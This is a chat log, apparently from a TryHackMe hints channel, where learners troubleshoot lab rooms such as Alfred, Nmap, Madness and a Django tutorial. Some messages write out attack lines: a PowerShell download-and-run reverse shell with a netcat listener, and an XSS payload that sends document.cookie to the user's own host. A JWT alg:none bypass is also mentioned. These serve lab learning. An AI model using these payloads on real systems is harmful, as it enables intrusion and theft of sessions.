hi all , in need of a hint for ctf100 flag75 .. I need the level3 passwd.. clue is "search the file"... file in level2 directory is "nothing" and appears to be only ascii

it might be that you have to skip that one and come back to it as root

there was one that was like that for me if i recall

Anyone who can speak in private about Alfred? Just to avoid some info leaks xd

You can ask here and someone who can assist you will 🙂

Mark as spoilers and there’s no problems

ok

ALFRED SPOILER: ||so when I write the command to run the reverse-shell "powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port" and I start "python -m SimpleHTTPServer" and "nc -lvnp [port]" I just get a
GET /Invoke-PowerShellTcp.ps1 HTTP/1.1
Host: IP:PORT
Connection: Keep-Alive
from netcat. The python HTTP server gets a 200 code but then a 400:
[08/Aug/2020 20:49:28] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
[08/Aug/2020 20:49:30] code 400, message Bad request syntax ('Windows PowerShell running as user bruce on ALFRED')
[08/Aug/2020 20:49:30] "Windows PowerShell running as user bruce on ALFRED" 400 -
|| I am doing something wrong, but I do not know what it could be. So any hints or tips are wonderful. Thanks.

Can you do a screenshot instead of copy pasta please

wait a minute

Waiting

To me, looks like the reverse shell from invoke powershell is going to your webserver

Whereas it needs to go to your netcat listener

That bit is fine

[08/Aug/2020 20:49:30] "Windows PowerShell running as user bruce on ALFRED" 400 -

That line is what suggests that to me

Wait

Now it looks like you've got them mixed up the other way

You got the GET request in your Netcat listener

'http://your-ip/:your-port needs to be your webserver

-IPAddress your-ip -Port your-port needs to be your netcat listener

damn... hahaha, let me try again with it

Can't use the same port for both

that was the error. Thanks a lot, I'm in now 👍

@oblique cliff Sorry

No worries I’m on my phone it’s hard to see lots of stuff like that on here

Hello guys, currently doing the vulnversity room, I am now in the last part where i need to|| exploit to root through systemd but I have no clue how to do this ^^"|| Any help?

Hello

@indigo holly I'd recommend doing some googling, you'll find resources that way

👀

I am at a question, that asks for 'is hidden inside a system mount' - I dont understand that question: "Flag 16 lies within another system mount." of linuxctf

Try to research where external drives and/or usbs are mounted on Linux @clear quail

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 8.74 seconds

what should i do

What room is this?

idk

Could you show me the full nmap command that you are using please?

can you help me?, i'm trying to scanning my machine

What machine, sorry?

nmap -sC 10.10.192.122
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 04:29 SE Asia Standard Time
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 8.74 seconds

Use nmap -sC -Pn 10.10.192.122

it works but it won't show the ports

SYN Stealth Scan Timing: About 12.55% done; ETC: 04:49 (0:03:01 remaining)
Stats: 0:01:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 36.50% done; ETC: 04:49 (0:02:09 remaining)

only like this

That might be your command

what should i do

But wait for the SYN Stealth Scan to finish first

Nmap scan report for 10.10.192.122 (10.10.192.122)
Host is up.
All 1000 scanned ports on 10.10.192.122 (10.10.192.122) are filtered

Nmap done: 1 IP address (1 host up) scanned in 213.30 seconds

just like this

What room is this?

hints

Sorry?

hints for tryhackme

hey dude what should i do with my commands to show the ports

What room are you on on TryHackMe?

On the tryhackme website, what room are you trying to do?

Nmap

Link please

https://tryhackme.com/room/rpnmap

i was completed all the task

Connect to the VPN.

but my cmd is sucks

Using this should help you :)

i'm connected

!vpn

Room: Madness
I got the file from the image and I got the password in it but I don't know username and room says that we don't have to ssh into the machine.
I'm not understanding what should I do, Any hint?

@hollow moon Can you type ps aux | grep openvpn and screenshot the output please

okay hold on

also no hidden directory found

If you're on linux*

no i'm not

im using windows

Oh

yeap

Let me check the command one second

Windows + VPN + Nmap doesn't work sometimes

room says that we don't have to ssh into the machine. @arctic crystal Where does it say that?

@trim haven sure

Please note this challenge does not require SSH brute forcing. that's different to don't use ssh

sorry it says we don't have to brute force into it

I recommend enumerating more

There's lots of images

where are images?

I only used image which is given on the room page

Enumerate harder

Did you do a portscan yet?

only two ports found but all ports scan is ongoing

@hollow moon Can you press the windows key and type powershell, then select Windows Powershell and enter Get-Process openvpn and tell me the output

completed only two ports are open

hi, for Simple CTF #2 What is running on the higher port? I did allports but still can't find this? There's only 3 ports open and none of them is the right answer.

Don't screenshot because I don't know what might popup and I want to be on the safeside

you know what, ignore my question

Don't screenshot because I don't know what might popup and I want to be on the safeside
@trim haven It should be impossible to have multiple VPNs on windows. Unless they are connected from 2 different devices.

i got it lol

I want them to get the process to see if they get an error

If there's an error they're not connected

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName

112      10     2364       7744              1644   2 openvpn

@trim haven

Okay good

Thank you

@hollow moon Try using this command: nmap -sC -p- <Machine IP>

nmap -sC -p- 10.10.192.122
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 05:04 SE Asia Standard Time
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 8.21 seconds
@trim haven

Okay try this (Sorry it's trial and error, I have not really come across this issue myself)

Try this one maybe: nmap -sC -pN -p- <Machine IP>

thats fine bruh

You are not properly connected to the VPN

It scans fine from here

Please connect to the VPN properly

i'm connected

You are not connected properly.

Sometimes it may say you are but you aren't, it's an issue with openvpn/access page.

Try closing OpenVPN and re-opening it.

Then re-connect to the VPN.

it keeps disconnecting if you are using it on windows

If that doesn't work, please go to <tryhackme.com/access> and regenerate & redownload your configuration file.

it keeps disconnecting if you are using it on windows
@arctic crystal Then you are doing something wrong

Because I do not have that issue

is it maybe because I try to connect my vpn both in VM and my host machine?

Yeah

Yes, don't do that

Don't do that, it makes bad things happen

You have a single VPN IP, it can't be shared by both without NAT

And Jabba sad, you don't want to make Jabba sad :(

yeah I stopped doing that now

Otherwise, how does it know where to send the data?

Enumerate harder
@stuck fractal
I did more enumeration and found one image which has some errors and it is not opening nor the steghide supports its format and zsteg and binwalk also give nothing

What type of image is it?

What do the header bytes say? What does the file extension say? What do file trailers etc say?

(These are rhetorical)

png

also where can I sea header bytes and that trailers you say

Warning: PNG image did not start with IHDR
I get this warning though

Ok, but do the trailers etc match PNG?

Have you checked the last two bytes?

Ok, but do the trailers etc match PNG?
@stuck fractal how to check that

Well, sounds pretty straight forward to me. Find out the structure of a PNG, see if it matches

no not like that I'm asking how can I view the headers and trailers of the image I have with me

How would you look at a file if you want a human-readable representation of raw bytes?

sorry I don't know that

binary files like images aren't the same as text. if you want to look at file headers and such, you should probably use a hex editor to see the raw data

xxd is probably available on your system, so you might check that first, though for future tasks you might need other tools as well.

there are some graphical hex editors

Bless, ghex

ok I'll check that thank you

ok I have got this now, do the numbers in first line represent header?

this is a google question now

google proper png and jpg headers

ok

ok so 8950 4e47 0d0a 1a0a is png signature and image header is after it

but IHDR should be mentioned I guess for image header which I cant see here in my image

https://en.wikipedia.org/wiki/Portable_Network_Graphics#File_format
https://en.wikipedia.org/wiki/JPEG#Syntax_and_structure

yes I read that

there's no header for my image

So maybe it's not a PNG then

it matches the png signature but other things are missing

ya

it matches jpeg format but only signature is different

how can I edit that signature

Using a hex editor

xxd works for it or I'll need to install one of these

Bless, ghex

Sounds like a google question to me

ya found it

hello, i need help in anthem VM box, i am at task 3, question 2. I dont know the username of the account so i cant ssh. What should i do? Thanks

help or hint? help=> #room-help

hint: usernames are sometimes re-used in different ways for different services

i tried the usernames in the website

are usernames case sensitive

?

i think i gave you a pretty good hint. If you are looking for the answers, then try a writeup. there's not much else I can hint at without just typing the answer for you here

please don't bro people. it's kind of disrespectful

sorry, i will try now

@arctic crystal I fell in that trap as well lol. Took me 15 mins to realise my mistake on that file

Hi Guys. I am newbie student. Trying to complete my first room: "Learn Linux". Task 43. Is the last task. But, i dont know how can I get root permissions to see the file at /root/root.txt If someone knows a hint...I appreciate every kind suggestion.

I recommend looking back, it describes the most common way that a genuine user can run things as root

Using sudo

thanks. I'll try harder. 🙂

My tip would be to make sure you have all the users on the box, not just the shibas

And look for files that are out of place

Maybe search for files belonging to each user one by one

yeah. I notice that i have the passwords for all the shibas.....but no one is at sudoers file

But I think this is the challenge...try to discovery myself

🙂 thanks one more time. I will check with more attention for all the files

maybe there is another user you haven't found yet?

(or a couple of them)

there 2 more users: noot & nootnoot And i dont have any idea how to get their passwords...lol. BBut i will keep try

Maybe search for files belonging to each user one by one```

That's my hint for you RN

@stuck fractal Great HInt...! very nice! i'll check these files again with more attention

thank you guys! helps a lot 🙂

Find is really useful . Very nice challenge

Starting Nmap 7.60 ( https://nmap.org ) at 2020-08-09 12:21 WIB
Couldn't open a raw socket. Error: Permission denied (13)

can you help me

Don't use WSL. #general for this sort of thing.

i'm running with ubuntu

Hey guys I'm unable to login to the OSCP Buffer Overflow Prep machine using xfreerdp. Any solution?

Stick to one chat @next oxide When someone who knows about your issue sees your message, they will answer 🙂

Yeah okay

hey lads

does anyone know where password are stored by any chance?

🤔

nvm, figured it out

Room: https://tryhackme.com/room/intronetworking
Task 9: #4 Where is the very first place your computer would look to find the ip address of a domain?

I google it and i can't find nothing

What?

You should be able to find some stuff googling 😉

90% or something like that of THM questions can be found by googling a bit

@white salmon look up how DNS works.

there is no need of googling, just read the paragraph that was before your question
the answer is in the same paragraph

read harder

I didn't read 😅

Sorry

the purpose of the room is reading the contents xD

Yes, i real all except this task

lol

i writed before the answer but i bad typing

Thanks to all for help me

👍

hello anyone , im in recovery room , im success to decrypt files in webserver but why flag5 not open

@sick sun did you restore the decrypted files?

@short fox yes i was decrypted files on ||htdocs||

@sick sun not sure then. Double check to make sure they’re all decrypted properly with the right key and all the names are correct.

@short fox yes i was decrypted all files in || htdocs || , ttitle index.html is || Recoverysoft || ?

Did you put the decrypted files back into the machine?

@woven mirage yes right

i put all decrypted files on machine

@sick sun all the file names of the decrypted files should be exactly the same as the encrypted ones. Just replace the encrypted files with the decrypted ones using the same names.

yes i was do all but flag5 not showing up " || index.html reallyimportant.txt todo.html ||

I’m not sure then. My only guess would be a problem with the decryption.

can someone please help me with this?

what does it mean by host machine?

your own machine

should I exit out of ssh and use my own terminal?

or your kali machine

ah, okay

so I should exit out of the ssh then?

or you can open other window

and not close the ssh

true, thanks man

🕺

im guessing this wasn't meant to happen

any idea how to get it working?

i used the exact command THM told me to use

lhost is wrong

what means local host?

oh fuck

well nvm

xd

what? 😟

look

oof

your lhost is wrong

yeah?

Learn to read error messages, they’re very informative

oh true I just saw it

im meant to put my own ip

ah, thanks man, I didn't really look at the command too carefully

Hi! who can I ask for help with the Linux Challenges room?

yeah, just ask

Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long.

How do I search for strings in all files?

thats the most difficult one

you have to list every file

and grep everyone

but grep looks at the file names and not their content.... no?

No

thats absolutely wrong

grep look inside files

find / -type f | grep ....

goes over the output of find, no?

yes, but grep have to know how to separate each file

i suggest to read the writeup

thats the most difficult on the room

that flag

read the command and try to understand it

cool, thanks, wasnt aware there was a write up. will check.

if you dont understand something on the command, do your research and if you dont know something ask here

@short fox but decrypted is rigt

no error with index.html

@sick sun I’m not sure then. Have you checked the write up and tried another method to see if there’s any change?

i suggest to read the writeup
@vale bramble #room-hints is usually for people who want to avoid write-ups :)

yeah but that flag in specific is very hard, and there is a lot of parameters to explain,that would be too much, for me it was better to look writeup and do own research. anyway, i will have it in mind, thx

If you don't want to explain it, or you don't feel able to give a hint, you don't have to.

i have no problem of explaining the whole comand and i feel able, i only suggest him to ask about something specific he dont understand about the command, thats all

This channel is for hints, best not to point people to writeups if they just want a hint?

you are right, thats why i said i will have it in mind

task 23 day 18```
I got the answer but THM is not accepting it

is there any problem with that task?

Nope.

No your answer is wrong

can I post answer here? to check

I don't think you can.

If you are able to avoid sharing answers it is appreciated :D

ok I'll just send it and delete once you guys check it

is this the right one?

@stuck fractal

Wrong value @arctic crystal

ok

That's your authid

Not the admins

ok then any hint on what I'm doing wrong ?

You're going to the page yourself?

||</p><script>window.location = 'http://<my-machine-ip>/page?param=' + document.cookie </script><p>||
I'm runnig this command in the text box and starting nc -nlvp 80 on terminal

And then

You need to wait

If you get your own authid, restart the listener

I get this

I tried restarting

do I need to wait after this?

Restart your listener. don't go to the page again

Leave the page alone

ok

If you visit the page, you'll steal your own cookie

I was refreshing the page after starting listener again

Don't do that

That runs the JS again

got it

Thanks

I'm in: https://tryhackme.com/room/django Task 3: 4. Migrate your changes by running python3 manage.py migrate

I have errors when i try that command, and i do all the steps

What are the errors?

I don't know why i have all of these errors

The last line is the only one that matters

This is my urls.py

I tried without the {}

I'm doing something wrong?

You see the last line, it tells you exactly what's wrong

Do you have basic knowledge in python?

Yes

I have to import my app?

What does the error say?

@white salmon remove the {} in your path() variable

they were there for demonstration

I tried without them

And nothing

1 sec

they were there for demonstration
@glossy basin That i was thinking

https://github.com/Swafox/Django-example/tree/master/mysite

use this

it's an exact same example that works

Just browse files there and compare to you ones

Ok, thank you. I will read the settings.py and the urls.py and solve my issue

👍

This space matter?

My mspaint skills are amazing

It doesn't

Same error

did you migrate before creating any apps?

Yes

I will use windows for this

Hi, i have a problem with the room zthobscurewebvulns / task#18 (challenge jsonWT alg:none), if i modify only alg by none, it work but when i modify the role by admin, the vm crashes

i don't understand, the differency beetween changing the header and payload.. this is the same fonctionality right? (decode, modify, encode)

(done)

lol after hours trying to read the same reviews on the juice store found his brother name.... this was so far fetched I would never in a million years keep looking at his reviews if it wasnt for the help....

@wind fog yes. Did you leave off the signature and just end with the . ?